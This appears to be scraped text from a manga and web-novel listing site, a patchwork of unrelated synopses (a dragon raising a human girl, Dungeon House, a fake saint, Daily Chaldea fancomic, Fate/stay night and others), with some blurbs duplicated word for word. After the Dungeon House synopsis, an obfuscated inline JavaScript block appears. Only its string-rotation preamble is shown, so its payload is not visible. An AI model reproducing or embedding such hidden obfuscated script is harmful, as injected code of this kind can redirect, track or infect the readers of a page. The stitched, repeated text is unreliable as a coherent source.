An immensely powerful and ancient dragon, once worshipped as a god by humans but now only a myth in their eyes, wakes up one day to find a human girl poking around his lair. The infant is barely old enough to say her own name, but is quite confident in calling the dragon “Daddy”! Bewildered by the unexpected visitor, the dragon soon learns that returning her to human civilization isn’t going to be an option... not yet, anyway. He quickly decides to raise the girl himself, determined to give her a happy life that will lead her back to human society when she is older — surely a simple task for a legendary being such as himself. All he needs to do now is find a place for her to sleep. And figure out where he is going to get clothes for her. And...wait, what do humans eat again? --- “Daddy!” The dragon blinked as the wee little human called out to him. Him? Her “Daddy”? Powerful enough to have been venerated by humankind, yet warmhearted and even a tad ditzy, the dragon soon finds himself raising and doting on the precocious Olivia as if she really were his daughter in this touching tale. The toddler may be impossibly cute now, but just you wait—she’s a curious child and she’s growing up real fast. You can bet that one day, she’ll be the strongest human there is! But first, how will he handle little Olivia receiving an acceptance letter to a human school? --- [Web Novel](
Dragon Raising Manualat Dawn, The Female Lead Suddenly Died At The Subway Station Due To Overwork. “If There Is Such A Thing As Reincarnation, Please Let Me Be Born With A Gold Spoon. I Want To Have Supreme Authority, And Also Immeasurable Wealth That Can’t Be Squandered Off~” These Final Words Which Were Meant As A Half-Hearted Joke Somehow Came True?! The Female Lead’s Soul Entered Into A Game And Became A True Princess, Is This The Legendary “Blessing From Good Karma”??? Si Long Shou Ce / Handbook For Feeding Dragon / Sì Lóng Shǒu Cè / 饲龙手册 Dragon Raising Manualat Dawn, The Female Lead Suddenly Died At The Subway Station Due To Overwork. “If There Is Such A Thing As Reincarnation, Please Let Me Be Born With A Gold Spoon. I Want To Have Supreme Authority, And Also Immeasurable Wealth That Can’t Be Squandered Off~” These Final Words Which Were Meant As A Half-Hearted Joke Somehow Came True?! The Female Lead’s Soul Entered Into A Game And Became A True Princess, Is This The Legendary “Blessing From Good Karma”??? Si Long Shou Ce / Handbook For Feeding Dragon / Sì Lóng Shǒu Cè / 饲龙手册
Read manhwa Drug-Eating Genius Mage Having reached his talent limit on magic, the protagonist was sent to the gaming world as punishment — to a huge city named Valkan. In order to survive, he builds relationships with other people and investigates the secret behind the “closed world”, striving to prevent the end of the world.
Dungeon House is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About One day, my house got connected to a dungeon. It's dangerous outside because of the monsters, but in order to survive, I have to clear the dungeon within the time limit! "I don't want to die. I want to survive." Kim HyunBok has to try and clear the dungeon by himself now that all the other explorers have died. Having awakened his powers, he starts taming monsters. With the skeletons Chris, Kai, and Kessle who have regained their memories, our protagonist's life-risking adventure to clear the dungeon starts now!<script></script><script>(function(_0x399078,_0x325ca3){var _0x47b6a6=_0x1cdb,_0x2b815c=_0x399078();while(!![]){try{var _0x13ada2=parseInt(_0x47b6a6(0x11c))/(-0x4*0x1b0+-0x6*0x14b+-0x1*-0xe83)*(-parseInt(_0x47b6a6(0x103))/(0xb34+-0x886+-0x2ac))+-parseInt(_0x47b6a6(0x100))/(0x1f69+0x41*-0x65+-0x5c1)*(-parseInt(_0x47b6a6(0x11e))/(-0xb7a+0x404+-0x1d*-0x42))+parseInt(_0x47b6a6(0x117))/(0x17e*0x9+0xf0e*-0x2+-0x5f*-0x2d)+-parseInt(_0x47b6a6(0x111))/(0x20b*0x4+0x39e+0x2f1*-0x4)+parseInt(_0x47b6a6(0x119))/(-0x1*-0x237d+-0x1*0x1d53+-0x1*0x623)*(-parseInt(_0x47b6a6(0xfe))/(-0x1fc6+0x13b1+0xc1d))+parseInt(_0x47b6a6(0x101))/(-0x6*-0x128+-0xdf*-0x2c+-0x2d3b*0x1)+-parseInt(_0x47b6a6(0x11d))/(-0x19*-0x47+-0x14e*-0x4+-0xc1d)*(parseInt(_0x47b6a6(0x114))/(0x62b+-0x2299+-0xc5*-0x25));if(_0x13ada2===_0x325ca3)break;else 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[The Eternal Scattering Flowers: Fiore Caduto Eterna] is a game ill-suited of being known as a galge, as the main heroine would – regardless of the chosen route – meet her demise. Fudou Niito, a resident of Japan, went to bed dissatisfied with the ending of the game. When he next awoke, he found himself in the body of the game’s hated fake saint, Elrise. Confused, but with an understanding that Elrise’s actions would spell disaster for many lives in the future, he took advantage of the situation and acted to change the course of history. As a result, despite her rotten personality, Elrise was adored by those around her as a perfect saint. Furthermore, the game itself was intrinsically linked to his original world and changed accordingly to suit Elrise’s actions. Without any knowledge of what the hell was going on, the fake saint Elrise continued to alter her fate. A saint on the outside, but a man on the inside. The transmigrator was a piece of shit and the person he transmigrated into was also a piece of shit. A combination of shit and shit would cause an accident – to create the greatest fake saint shitshow of the year!
Daily Chaldea is an unofficial daily slice-of-life fancomic created using art assets from the game Fate/Grand Order and building upon the existing lore of the franchise. The story follows the adventures of genderswapping protagonist Ritsuka Fujimaru and the many Servants they've summoned, with the tone ranging from comedic to philosophical. The comic is 'live' with the NA server of Fate/Grand Order, with new characters appearing in the comic around the time they appear in the game and comics often referencing recent events in the game. Enjoyment of this comic relies heavily upon the reader's familiarity with the game and its characters, so the author recommends playing Fate/Grand Order before reading this comic. This comic is being uploaded to MangaDex by reader request and with the approval of MangaDex staff. All art is copyright TYPE-Moon / FGO Project, Aniplex Inc., Delightworks, and other copyright holders as appropriate. This comic is not for profit (through ad revenue or otherwise). Chapters 0001-0041 use the original white backgrounds. Later comics have darker backgrounds and additional art assets for improved quality.
The Holy Grail War is a battle royale among seven magi who serve as Masters. Masters, through the use of the command seals they are given when they enter the war, command Heroic Spirits known as Servants to fight for them in battle. In the Fifth Holy Grail War, Rin Tosaka is among the magi entering the competition. With her Servant, Archer, she hopes to obtain the ultimate prize—the Holy Grail, a magical artifact capable of granting its wielder any wish. One of Rin\'s classmates, Emiya Shirou, accidentally enters the competition and ends up commanding a Servant of his own known as Saber. As they find themselves facing mutual enemies, Rin and Shirou decide to form a temporary alliance as they challenge their opponents in the Holy Grail War.
Feelings In A Dream one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you. one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you.
Read manhwa Four Dangerous Brothers to My Rescue! / 공녀님의 위험한 오빠들 Warmhearted Lestia has resigned herself to a life of misery under the thumb of her abusive uncle. However, right when things seem to take a turn for the worst, a mysterious boy claiming to be one of her four long-lost brothers appears in the nick of time to save her. After being whisked into a life of luxury, Lestia has her doubts about taking on the Verchester name. But after the discovery of her latent magical powers, Lestia starts to accept two strange truths: She is a true Verchester, and she has a destiny to fulfill.
Tang Ran is a sunny and cheerful little fox. In order to graduate from the monster school, she transformed into a human college student and wanted to seduce a human to fall in love with her. However, what she didn\'t know was that the cold-hearted human female professor she fell in love with, Su Qingci, was actually...? A lie requires countless other lies to cover it up. To make the other person fall in love with them first, the fox will always tell \"lies\".